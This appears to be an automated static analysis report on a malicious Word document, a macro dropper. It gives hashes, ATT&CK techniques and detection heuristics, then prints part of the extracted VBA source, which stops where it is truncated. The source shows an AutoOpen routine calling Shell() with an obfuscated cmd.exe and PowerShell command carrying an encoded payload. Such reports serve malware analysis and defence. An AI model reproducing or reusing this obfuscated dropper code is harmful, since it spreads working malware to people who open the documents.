Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 954f8b06741adf87…

MALICIOUS

Office (OLE)

Size: 115.2 KB | Created: 2018-06-05 16:39:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-31
MD5: 27a21ae233b6c9ab6ad3c26ece5a82c6
SHA-1: f1877b0062902f516b8a6481e6c773dfb3c38a53
SHA-256: 954f8b06741adf878fd457e0dd43327dc130948ec4978ecd78492156efcecdaa
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls a function which uses the Shell() command. This function appears to construct and execute a command line that includes obfuscated calls to 'cmd.exe' and 'powershell.exe', likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6574551-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6574551-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574551-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    The VBA code calls Shell(), which executes an external command line.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen subroutine, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches documents that carry only p-code, and documents whose source extraction failed, so that no readable VBA source is available.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11632 bytes
SHA-256: b49cfa345edf5b1a778ee3063c49420956794010bae339153f542741cb1f671a
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "MJwoFHiLnVur"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iPMVTYcJEm()
On Error Resume Next
iswFF = Hex(OsSiuw + Hex(HvLnSi) * 36585 + Round(Nowhm))
UjjEOR = Cos(oXjcWa)
hZbjo = CDate(wCbWvz)
wUDzX = Cos(rtLlZ)
jzTXiL = Hex(ILcoNN + Hex(KuSFKJ) * 31476 + Round(iTTjFE))
NVoBDI = Cos(dizLzp)
Ujqmi = CDate(zbGbQ)
lVzDz = Cos(rZwGA)
iPMVTYcJEm = CaiFHu + Shell(ciJslwOFfJ + Chr(VjnaH + vbKeyC + ZpGXkXqWqUo) + jVjnET + bIYARHiHzr + lqcEPvYJPkc + FFXqCoazG + DqwVlZNqNJ + aJOBk + izwaoBcqJz, 79505 - 79505)
JkhQn = Hex(wJakJ + Hex(duawll) * 29480 + Round(lnWGd))
zFIQLO = Cos(dctajn)
cGpALM = CDate(DfvnMq)
aVObnN = Cos(tBKZv)
End Function
Sub Autoopen()
On Error Resume Next
zRhVE = Hex(QkfwWu + Hex(AwaNc) * 98004 + Round(sDGfz))
aqjEfa = Cos(EalzZ)
OaCuXr = CDate(WMMSoh)
YPwKCW = Cos(XaAbT)
iPMVTYcJEm
iMaLcn = Hex(kwqIjn + Hex(WNdQP) * 95512 + Round(rpdav))
WqzCT = Cos(vBJmB)
AnpcYo = CDate(ODpKwk)
VvnXw = Cos(hlXuzo)
End Sub


Attribute VB_Name = "fsRMbcaOJKPQp"
Function jVjnET()
On Error Resume Next
jGQHdd = Hex(zTMsEh + Hex(naiKNI) * 59714 + Round(nzwKGb))
WGSHVl = Cos(bHCHQH)
ijvhw = CDate(SWCGwB)
STLTXC = Cos(zGZwMN)
lYzMuhr = "md XbNzEoTPOf" + "r LUSn" + "wfoO" + "ECSJjjsvuw" + "MTb qt" + "aEkuE &    " + " %^c^o^m^S"
zbIFr = Hex(jEQBc + Hex(nhAEM) * 17742 + Round(wTHwj))
OKLcHw = Cos(kmSvu)
GiFND = CDate(qPPQw)
MnsQh = Cos(iYVdNX)
ssdzi = "^p^E^c^%   " + "  %^c^o^m^S^p^" + "E^c^%" + "     /V " + "        /c    " + "   " + "    set %mMzQbQ" + "jisJZPYUJ"
ICHXAO = Hex(JKCpq + Hex(EmsUw) * 87085 + Round(auLcT))
ZQVjc = Cos(iluHi)
PBrsCk = CDate(abosj)
fTJCO = Cos(fDvpoo)
nsINYjFMZ = "%=iYFbTUj&&s" + "et %mPV" + "FNlfpZzDXN%" + "=p&&set %" + "OZhJoNXrM" + "AA%=o" + "^w&&set %iSjScu" + "YaDTzQGLC%=SL" + "RBomD&" + "&s"
ZXIUJi = Hex(cjrWi + Hex(aZtdkY) * 79252 + Round(zwYjfR))
oTMDD = Cos(LjRHi)
WXvcm = CDate(VQFJR)
PzzcZ = Cos(ldNGnP)
KlUTNaItwbz = "et %wBKIlBfjNN" + "%=!%m" + "PVFNlfpZzDXN%" + "!&&set " + "%ChhpvffT" + "kSfSzrw" + "%=k" + "UiWwZE" + "&&set %"
TiVPtb = Hex(GLSHB + Hex(mPJAz) * 59377 + Round(InEYi))
hWAzP = Cos(jzTpAA)
hvwEj = CDate(aDzVUM)
INWfZ = Cos(jmuzFL)
UqsjJKSZ = "iZVZYc" + "ZzXKUjG%=e^r&" + "&set " + "%bHAblMSXJLc" + "%=!%OZhJo" + "NXrMAA%!&&" + "set %YrJm" + "EwiVoT%=s&" + "&set %CsbT" + "nPCS"
jVjnET = lYzMuhr + ssdzi + nsINYjFMZ + KlUTNaItwbz + UqsjJKSZ
End Function
Function bIYARHiHzr()
On Error Resume Next
XUYTZ = Hex(AlwGJ + Hex(YjHDkA) * 63033 + Round(HbTanP))
TZnws = Cos(dUFfdw)
MXLGN = CDate(BQZjJw)
YvwBz = Cos(KFjLIJ)
JjDkHkMt = "srOjlvF" + "%=vYzOzbtF" + "NUH&&" + "set " + "%oPLUvCU" + "FUHFUAb%=he&&s" + "et %" + "wQCEEADUpj" + "i%=ll&&!%wBKIl" + "Bfj"
quMBY = Hex(EVajP + Hex(NrNnu) * 82019 + Round(zUUhYE))
wlFfMD = Cos(wFGEXK)
uCzMj = CDate(kowRmU)
LwVNnz = Cos(ISPvXM)
MOUqi = "NN" + "%!!%bHAblMSXJL" + "c%!!%iZV" + "ZYcZzXKUjG%!!" + "%YrJmEwiV"
RlGiW = Hex(cDRWUr + Hex(wJpns) * 83833 + Round(lzjtQ))
TtbnCp = Cos(aTDpj)
oCIfz = CDate(wiuzcb)
fndRB = Cos(RwLic)
wsKparmQT = "oT%!!%o" + "PLUvCUFU" + "HFUAb%!!%wQC" + "EEADU" + "pji%! " + " -e IAAoAG4ARQ" + "B3AC0AT" + "wBiAEoARQB"
UfXndF = Hex(EcCWd + Hex(kAUrZ) * 88802 + Round(LzKjzB))
bRTdT = Cos(BiNYuQ)
cXacRz = CDate(QMzElo)
TVUqqc = Cos(YmIZC)
bNSizFa = "DAFQAIAAgAE" + "kAbwAuAEMAT" + "wBNAFAAUgBF" + "AFMAUwBp"
SGnvwJ = Hex(WnYhP + Hex(DmPUPr) * 60669 + Round(iJshE))
qDkRDO = Cos(fKZBI)
nGfwnb = CDate(ZRJSth)
ukwuN = Cos(WJTDHd)
ivFzFsOR = "AE8ATgAuAEQ" + "ARQ" + "BmAGwAYQB0AGUA" + "cwB0AHIAZQBBAG0" + "AKABbAHMAWQ"
uYbqT = Hex(PrwCM + Hex(GLOZt) * 35175 + Round(VrIuN))
nQFinc = Cos(JawBpT)
mSfwik = CDate(HjIkZk)
IJmdOL = Cos(qJNJaX)
KHfwu = "BzAFQA" + "RQBNAC4AaQB" + "vAC4ATQBlAG0AT" + "wBSAFkAU" + "wBUAFIARQB" + "hA"
jNNjaT = Hex(DLKMdp + Hex(jztNrG) * 2328 + Round(LXaHT))
IRpHMt = Cos(TvAzRw)
zcRlW = CDate(HLTvjR)
PBp
... (truncated)